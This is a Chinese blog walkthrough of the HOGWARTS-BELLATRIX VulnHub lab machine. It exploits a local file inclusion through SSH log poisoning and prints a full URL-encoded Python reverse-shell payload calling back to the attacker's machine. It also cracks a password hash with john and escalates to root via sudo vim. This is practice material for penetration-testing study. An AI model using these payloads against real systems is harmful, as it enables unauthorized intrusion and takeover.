vulnhub靶场,HOGWARTS-BELLATRIX

最新推荐文章于 2024-03-03 15:23:43 发布
最新推荐文章于 2024-03-03 15:23:43 发布
阅读量232 收藏
点赞数
分类专栏: 靶场实战 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kukudeshuo/article/details/120241158
版权

vulnhub靶场,HOGWARTS-BELLATRIX

环境准备

靶机下载地址:https://www.vulnhub.com/entry/hogwarts-bellatrix,609/
攻击机:kali(192.168.109.128)
靶机:HOGWARTS-BELLATRIX(192.168.109.178)
下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式

信息收集

使用arp-scan确定目标靶机

确定目标IP为192.168.109.178
使用nmap扫描查看目标靶机端口开放情况

开放端口:22、80
浏览器访问目标靶机80端口

页面就是一张动图和一些奇怪的字符串
查看网页源代码

这里很明显提示说有一个php文件存在文件包含漏洞,使用file进行传参
分析那段字符串和他的规律发现php文件为ikilledsiriusblack.php

访问一下ikilledsiriusblack.php

可以看到还是这个页面,那直接尝试去包含密码文件验证漏洞是否存在

可以看到漏洞验证成功

渗透过程

前面通过信息收集发现开启了ssh端口,所以可以尝试去包含ssh日志默认日志文件

包含ssh日志文件成功,现在只需要恶意连接ssh,污染ssh日志文件

验证一句话木马是否成功写入

http://192.168.109.178/ikilledsiriusblack.php?file=/var/log/auth.log&cmd=id


可以看到命令成功执行,接下来就可以进行反弹shell了
kali:

靶机:

http://192.168.109.178/ikilledsiriusblack.php?file=/var/log/auth.log&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.109.128%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27


可以看到kali这边成功反弹回来一个shell

权限提升

因为这是反弹回来的shell,所以sudo命令肯定是不可能的
查看suid命令,也没有发现能利用的

在各自的家目录里面也没有发现什么
重新回到/var/www/html目录

发现一个可疑目录,进去查看

里面有两个文件,查看其内容

.secret.dic为一个字典

Swordofgryffindor文件内容为lestrange用户加密后的hash值
靶机使用python开启一个临时http服务

kali将这本字典下载下来

将密码本改个名字

将那个加密后的hash值也复制到kali本地,使用john进行破解(使用pass.dic字典)


使用su命令切换为lestrange用户

查看lestrange用户的sudo命令

可以看到可以使用vim命令,直接上提权网站查询利用方法

sudo vim -c ':!/bin/sh'


成功提升为root权限
切换至其root目录,成功获得flag,靶机OGWARTS-BELLATRIX渗透结束

super 硕
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1171
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
angular-hogwarts-tdd-kata
05-30
Angular Hogwarts TDD Kata “您在这里学习代码制作的... cd angular-hogwarts-tdd-kata 你有两种方式来运行这个 kata: 使用 Chrome、 Express.js网络服务器和 Karma 测试运行器。 在 Firefox 中使用普通文件。
Vulnhub靶机_HOGWARTS: BELLATRIX
学术渣渣的博客
10-29 329
文章目录靶机介绍渗透过程靶机IP端口扫描扫描网站目录本地文件包含漏洞污染ssh日志文件getshell提权 靶机介绍 下载地址:http://www.vulnhub.com/entry/hogwarts-bellatrix,609/ 难度:中等 靶机描述: The evil Bellatrix Lestrange has escaped from the prison of Azkaban, but as … Find out and tell the Minister of Magic Difficul
靶机:Hogwarts: Bellatrix
weixin_50339323的博客
08-03 283
一、信息收集 1、靶机ip nmap 192.168.8.0/24 使用nmap进行扫描,ip地址为:192.168.8.157 2、靶机端口 Nmap -Sv -p- -A -O 192.168.8.157 PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.3p1 Ubuntu 1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.46 ..
vulnhub靶机-Bellatrix
xbzxz的博客
01-10 181
vulnhub靶机-Bellatrix
Bellatrix靶机总结
qq_45301512的博客
01-08 112
靶机下载地址:打开靶机,使用nmap扫描网段,获得主机ip和端口可以看到扫描到了靶机的ip,并且开放了80端口和22端口根据开放的80端口,打开网站信息收集,先进行目录爆破试试并没有发现什么有用的信息右键查看源代码看看发现一个提示,他说已经给出了一个php文件或许是上面的那一大串猜测ikilledsiriusblack.php,因为他在重复写ikilledsiriusblack这个文件还真的存在文件包含漏洞。
hogwarts-api
05-07
并且不要忘记在minikube中激活Ingress,并在hogwarts-school-deployment.yml中更改Docker Registry 使用Docker注册表更改URL image: $DOCKER_REGISTRY/$DOCKER_IMAGE_NAME:$BUILD_NUMBER 并在hogwarts-school-...
react-hogwarts-tdd-kata
05-29
git clone https://github.com/zhon/react-hogwarts-tdd-kata.git cd react-hogwarts-tdd-kata`` npm install npm start 访问localhost:3000/index.html查看运行的代码。 要运行测试: npm test或npm r
hogwarts-institutional-portal
04-06
霍格沃茨机构门户 该项目是使用版本8.3.17生成的。 开发服务器 为开发服务器运行ng serve 。... 如果您更改任何源文件,该应用程序将自动重新加载。 代码脚手架 运行ng generate component component-name生成一个新的...
Hogwarts-React
04-08
霍格沃茨(Hogwarts):获奖猪迷的React应用 React Week 1项目 项目目标: 创建一个显示所有猪瓦片的索引 在磁贴中渲染每个猪的名字和图片 在用户点击时显示猪的详细信息 过滤油脂润滑的猪 根据名称对猪进行排序 ...
vulnhub-HOGWARTS: DOBBY
csdn_q1的博客
12-29 474
VULNHUB-HOGWARTS: DOBBY 地址:https://www.vulnhub.com/entry/hogwarts-dobby,597/ 难度:容易 信息收集 通过Mac地址找出IP 端口扫描 发现只开了个80端口↓ 通过浏览器访问↓ 发现是个apache的默认页面 接下来照例查看源代码↓ 在末尾发现了提示 去访问下这个页面↓ 是一个密码提示 目录扫描 ---- Scanning URL: http://10.9.11.225/ ---- + http://10.9.11.2
Vulnhub靶机实战-HOGWARTS DOBBY
黑白的博客
01-10 491
声明 好好学习,天天向上 搭建 使用virtualbox打开,网络和我的PRESIDENTIAL一样,是要vmware和virtualbox互连 渗透 存活扫描,发现目标 arp-scan -l nmap -sP 192.168.239.1/24 端口扫描 nmap -T4 -A 192.168.239.8 -p 1-65535 -oN nmap.A 开启端口 发现开启80 访问80 http://192.168.239.6 F12查看源码,发现目录 访问 http://192.168.239.8
Vulnhub靶机:Bellatrix
最新发布
qq_48904485的博客
03-03 490
一、介绍 运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:Bellatrix(10.0.2.9) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/hogwarts-bellatrix,609/ 二、信息收集 使用nmap主机发现靶机ip:10.0.2.9 使用nmap端口扫描发现靶机开放端口:22、80 nmap -A 10.0.2.9 -p 1-65535 打开网站未发现什么功能点 查看源码发现隐藏信息,
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7370
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
vulnhub渗透系列之EVM (内含许多疑问!!!)
来到了学渣的博客
01-28 1794
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 实验过程总结 1.这个靶机做下来,的确是比较好入手比较简单,但不建议去做,因为一些网络配置的问题,的确 挺复杂的,不知道如何解决,但如果解决了这个问题,那这个靶机还是很不错的。(见未解决的疑问 2.首先还是探测存活的靶机和开放的端口,虽然开放了139、44...
记一次vulnhub|渗透测试DC-4(常规和非预期提权思路)
crispr的博客
02-02 947
Five86-2 0X01 Main Point 1.Burpsuite爆破模块进行简单爆破 2.Hydra爆破进行SSH连接 3.CVE-2019-10149–exim漏洞进行本地提权
记一次vulnhub|渗透测试 DC-9
crispr的博客
01-15 2529
vulnhub DC-9 0X01 Main Point 1.Sqlmap的基本使用 2.LFI的利用 3.Port Knocking–端口敲门服务 4.hydra的基本使用–爆破ssh 5.sudo权限的枚举 0X02 前期嗅探和端口探测 kali下使用arp-scan获取靶机IP 得到靶机IP 172.20.10.10, nmap探测靶机开放的端口服务; 靶机开放了80和22端...
vulnhub靶场,RED: 1
kukudeshuo的博客
02-11 4377
vulnhub靶场,RED: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/red-1,753/ 攻击机:kali(192.168.109.128) 靶机:RED: 1(192.168.109.197) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 目标:提升为root权限获取root目录下的flag 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.197
作为一个测试开发工程师,现在对https://petclinic-angular-web.k8s.hogwarts.ceshiren.com/#/welcome网址进行测试,基于Page Object Models的形式,请输出代码
06-10
好的,以下是一个简单的 Page Object Model 的代码示例: ```python from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值